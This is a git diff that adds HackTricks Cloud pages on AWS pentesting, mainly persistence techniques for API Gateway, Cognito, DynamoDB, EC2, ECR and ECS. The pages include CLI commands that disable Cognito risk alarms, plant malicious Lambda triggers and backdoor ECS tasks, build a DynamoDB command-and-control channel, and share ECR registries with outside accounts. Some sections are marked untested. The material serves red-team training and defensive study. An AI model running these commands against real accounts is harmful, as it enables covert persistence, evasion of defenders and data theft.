+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
new file mode 100644
index 0000000000..cfa7c3df4f
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
@@ -0,0 +1,35 @@
+# AWS - Permissions for a Pentest
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
+
+* The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/README.md b/pentesting-cloud/aws-security/aws-persistence/README.md
new file mode 100644
index 0000000000..901051f090
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/README.md
@@ -0,0 +1,2 @@
+# AWS - Persistence
+
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
new file mode 100644
index 0000000000..eeeaca42b9
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
@@ -0,0 +1,58 @@
+# AWS - API Gateway Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## API Gateway
+
+For more information go to:
+
+{% content-ref url="../aws-services/aws-api-gateway-enum.md" %}
+[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md)
+{% endcontent-ref %}
+
+### Resource Policy
+
+Modify the resource policy of the API gateway(s) to grant yourself access to them
+
+### Modify Lambda Authorizers
+
+Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
+Or just remove the use of the authorizer.
+
+### IAM Permissions
+
+If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
+Or just remove the use of the authorizer.
+
+### API Keys
+
+If API keys are used, you could leak them to maintain persistence or even create new ones.\
+Or just remove the use of API keys.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
new file mode 100644
index 0000000000..ce324c3a2b
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
@@ -0,0 +1,70 @@
+# AWS - Cognito Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cognito
+
+For more information, access:
+
+{% content-ref url="../aws-services/aws-cognito-enum/" %}
+[aws-cognito-enum](../aws-services/aws-cognito-enum/)
+{% endcontent-ref %}
+
+### User persistence
+
+Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
+
+* **Adding a User Pool** controlled by the user to an Identity Pool
+* Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
+  * Or to an **authenticated Identity Pool** if the attacker can login
+  * Or **improve the permissions** of the given roles
+* **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
+* **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
+
+Check how to do these actions in
+
+{% content-ref url="../aws-privilege-escalation/aws-cognito-privesc.md" %}
+[aws-cognito-privesc.md](../aws-privilege-escalation/aws-cognito-privesc.md)
+{% endcontent-ref %}
+
+### `cognito-idp:SetRiskConfiguration`
+
+An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
+
+{% code overflow="wrap" %}
+```bash
+aws cognito-idp set-risk-configuration --user-pool-id <pool-id> --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
+```
+{% endcode %}
+
+By default this is disabled:
+
+<figure><img src="https://lh6.googleusercontent.com/EOiM0EVuEgZDfW3rOJHLQjd09-KmvraCMssjZYpY9sVha6NcxwUjStrLbZxAT3D3j9y08kd5oobvW8a2fLUVROyhkHaB1OPhd7X6gJW3AEQtlZM62q41uYJjTY1EJ0iQg6Orr1O7yZ798EpIJ87og4Tbzw=s2048" alt=""><figcaption></figcaption></figure>
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
new file mode 100644
index 0000000000..c8ddc156ec
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
@@ -0,0 +1,91 @@
+# AWS - DynamoDB Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### DynamoDB
+
+For more information access:
+
+{% content-ref url="../aws-services/aws-dynamodb-enum.md" %}
+[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md)
+{% endcontent-ref %}
+
+### DynamoDB Triggers with Lambda Backdoor
+
+Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
+
+{% code overflow="wrap" %}
+```bash
+# Create a malicious Lambda function
+aws lambda create-function \
+    --function-name MaliciousFunction \
+    --runtime nodejs14.x \
+    --role <LAMBDA_ROLE_ARN> \
+    --handler index.handler \
+    --zip-file fileb://malicious_function.zip \
+    --region <region>
+
+# Associate the Lambda function with the DynamoDB table as a trigger
+aws dynamodbstreams describe-stream \
+    --table-name TargetTable \
+    --region <region>
+
+# Note the "StreamArn" from the output
+aws lambda create-event-source-mapping \
+    --function-name MaliciousFunction \
+    --event-source <STREAM_ARN> \
+    --region <region>
+```
+{% endcode %}
+
+To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
+
+### DynamoDB as a C2 Channel
+
+An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
+
+```bash
+# Create a DynamoDB table for C2
+aws dynamodb create-table \
+    --table-name C2Table \
+    --attribute-definitions AttributeName=CommandId,AttributeType=S \
+    --key-schema AttributeName=CommandId,KeyType=HASH \
+    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+    --region <region>
+
+# Insert a command into the table
+aws dynamodb put-item \
+    --table-name C2Table \
+    --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
+    --region <region>
+```
+
+The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
new file mode 100644
index 0000000000..e2f500bf06
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
@@ -0,0 +1,80 @@
+# AWS - EC2 Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EC2
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
+[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
+{% endcontent-ref %}
+
+### Security Group Connection Tracking Persistence
+
+If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
+
+If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
+
+### EC2 Lifecycle Manager
+
+This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
+An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
+
+### Scheduled Instances
+
+It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
+
+### Spot Fleet Request
+
+Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
+
+### Backdoor Instances
+
+An attacker could get access to the instances and backdoor them:
+
+* Using a traditional **rootkit** for example
+* Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
+* Backdooring the **User Data**
+
+### **Backdoor Launch Configuration**
+
+* Backdoor the used AMI
+* Backdoor the User Data
+* Backdoor the Key Pair
+
+### VPN
+
+Create a VPN so the attacker will be able to connect directly through i to the VPC.
+
+### VPC Peering
+
+Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
new file mode 100644
index 0000000000..cdea71f8d7
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -0,0 +1,124 @@
+# AWS - ECR Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECR
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-ecr-enum.md" %}
+[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md)
+{% endcontent-ref %}
+
+### Hidden Docker Image with Malicious Code
+
+An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
+
+### Repository Policy
+
+Add a policy to a single repository granting yourself (or everybody) access to a repository:
+
+```bash
+aws ecr set-repository-policy \
+    --repository-name cluster-autoscaler \
+    --policy-text file:///tmp/my-policy.json
+
+# With a .json such as
+
+{
+    "Version" : "2008-10-17",
+    "Statement" : [
+        {
+            "Sid" : "allow public pull",
+            "Effect" : "Allow",
+            "Principal" : "*",
+            "Action" : [
+                "ecr:BatchCheckLayerAvailability",
+                "ecr:BatchGetImage",
+                "ecr:GetDownloadUrlForLayer"
+            ]
+        }
+    ]
+}
+```
+
+{% hint style="warning" %}
+Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
+{% endhint %}
+
+### Registry Policy & Cross-account Replication
+
+It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
+
+<figure><img src="../../../.gitbook/assets/image (79).png" alt=""><figcaption></figcaption></figure>
+
+First, you need to give the external account access over the registry with a **registry policy** like:
+
+```bash
+aws ecr put-registry-policy --policy-text file://my-policy.json
+
+# With a .json like:
+
+{
+  "Sid": "asdasd",
+  "Effect": "Allow",
+  "Principal": {
+    "AWS": "arn:aws:iam::947247140022:root"
+  },
+  "Action": [
+    "ecr:CreateRepository",
+    "ecr:ReplicateImage"
+  ],
+  "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
+}
+```
+
+Then apply the replication config:
+
+```bash
+aws ecr put-replication-configuration \
+     --replication-configuration file://replication-settings.json \
+     --region us-west-2
+
+# Having the .json a content such as:
+{
+	"rules": [{
+		"destinations": [{
+			"region": "destination_region",
+			"registryId": "destination_accountId"
+		}],
+		"repositoryFilters": [{
+			"filter": "repository_prefix_name",
+			"filterType": "PREFIX_MATCH"
+		}]
+	}]
+}
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
new file mode 100644
index 0000000000..0b79be73e2
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
@@ -0,0 +1,128 @@
+# AWS - ECS Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-ecs-enum.md" %}
+[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md)
+{% endcontent-ref %}
+
+### Hidden Periodic ECS Task
+
+{% hint style="info" %}
+TODO: Test
+{% endhint %}
+
+An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
+
+```bash
+# Create a malicious task definition
+aws ecs register-task-definition --family "malicious-task" --container-definitions '[
+  {
+    "name": "malicious-container",
+    "image": "malicious-image:latest",
+    "memory": 256,
+    "cpu": 10,
+    "essential": true
+  }
+]'
+
+# Create an Amazon EventBridge rule to trigger the task periodically
+aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"
+
+# Add a target to the rule to run the malicious ECS task
+aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
+  {
+    "Id": "malicious-ecs-task-target",
+    "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
+    "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
+    "EcsParameters": {
+      "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
+      "TaskCount": 1
+    }
+  }
+]'
+```
+
+### Backdoor Container in Existing ECS Task Definition
+
+{% hint style="info" %}
+TODO: Test
+{% endhint %}
+
+An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
+
+```bash
+# Update the existing task definition to include the backdoor container
+aws ecs register-task-definition --family "existing-task" --container-definitions '[
+  {
+    "name": "legitimate-container",
+    "image": "legitimate-image:latest",
+    "memory": 256,
+    "cpu": 10,
+    "essential": true
+  },
+  {
+    "name": "backdoor-container",
+    "image": "malicious-image:latest",
+    "memory": 256,
+    "cpu": 10,
+    "essential": false
+  }
+]'
+```
+
+### Undocumented ECS Service
+
+{% hint style="info" %}
+TODO: Test
+{% endhint %}
+
+An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
+
+```bash
+# Create a malicious task definition
+aws ecs register-task-definition --family "malicious-task" --container-definitions '[
+  {
+    "name": "malicious-container",
+    "image": "malicious-image:latest",
+    "memory": 256,
+    "cpu": 10,
+    "essential": true
+  }
+]'
+
+# Create an undocumented ECS service with the malicious task definition
+aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
